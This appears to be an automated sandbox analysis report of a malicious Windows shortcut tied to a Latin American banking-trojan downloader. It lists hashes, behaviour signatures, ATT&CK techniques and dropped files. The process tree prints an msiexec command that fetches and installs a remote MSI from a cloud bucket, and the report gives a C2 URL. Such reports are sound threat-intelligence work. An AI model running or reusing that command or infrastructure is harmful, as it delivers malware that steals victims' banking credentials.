Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    16-11-2021 19:18

General

  • Target

    BoIetos - 16-11.lnk

  • Size

    1KB

  • MD5

    679deb658850ade14d991d11fc17fd79

  • SHA1

    9ba091d7556fbc8b2c254452344b4c4b2353fbad

  • SHA256

    c4919fddd43c203fef53a99e165c08dd26cc595693d293af25c11d21baec49de

  • SHA512

    71dfb75bef210abe99af5390ca3748b637dc0310ff2d7a68cf04ff2c80523a293d9d951457cfd37a6ffbba95d5cca27c6bd51c54042bba53df5f9bc25e193089

Malware Config

Extracted

Family

latam_generic_downloader

C2

http://ec2-52-53-236-128.us-west-1.compute.amazonaws.com/softcom.base

Signatures

  • Generic LATAM Downloader

    Generic Latin American MSI downloader used to drop various banking trojans.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\BoIetos - 16-11.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3568
    • C:\Windows\System32\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "https://yd2.s3.eu-central-1.amazonaws.com/lnstaIIog.msi"
      2⤵
      • Blocklisted process makes network request
      • Use of msiexec (install) with remote resource
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3884
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4424
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding C1742C18EA2E86C52E07F078B2550C83
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      PID:4368

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\Installer\MSI905A.tmp
    MD5

    6c987b189e48785533c1513488d9955b

    SHA1

    676f1ecac88f11f42673329a35c1d77351890869

    SHA256

    f67a12cfac8cc2bd55220006aaef6f26bcb1d46dd5229344c9e56bf547755f5f

    SHA512

    665ffba92e50a9878dbf49590297cd51e49496d69c71a3141db77f2da0f57f060fef422a483ffbf7195181b190f4a00bd4e415576e64ae8891fbf2fd6a65f8c5

  • C:\Windows\Installer\MSI9348.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • C:\Windows\Installer\MSI97AE.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • \Windows\Installer\MSI9348.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • \Windows\Installer\MSI97AE.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

  • memory/3884-119-0x000001A74DF50000-0x000001A74DF52000-memory.dmp
    Filesize

    8KB

  • memory/3884-120-0x000001A74DF50000-0x000001A74DF52000-memory.dmp
    Filesize

    8KB

  • memory/3884-118-0x0000000000000000-mapping.dmp
  • memory/4368-124-0x0000000000000000-mapping.dmp
  • memory/4368-126-0x0000000002FB0000-0x0000000002FB1000-memory.dmp
    Filesize

    4KB

  • memory/4368-125-0x0000000002FB0000-0x0000000002FB1000-memory.dmp
    Filesize

    4KB

  • memory/4424-121-0x0000028085A60000-0x0000028085A62000-memory.dmp
    Filesize

    8KB

  • memory/4424-122-0x0000028085A60000-0x0000028085A62000-memory.dmp
    Filesize

    8KB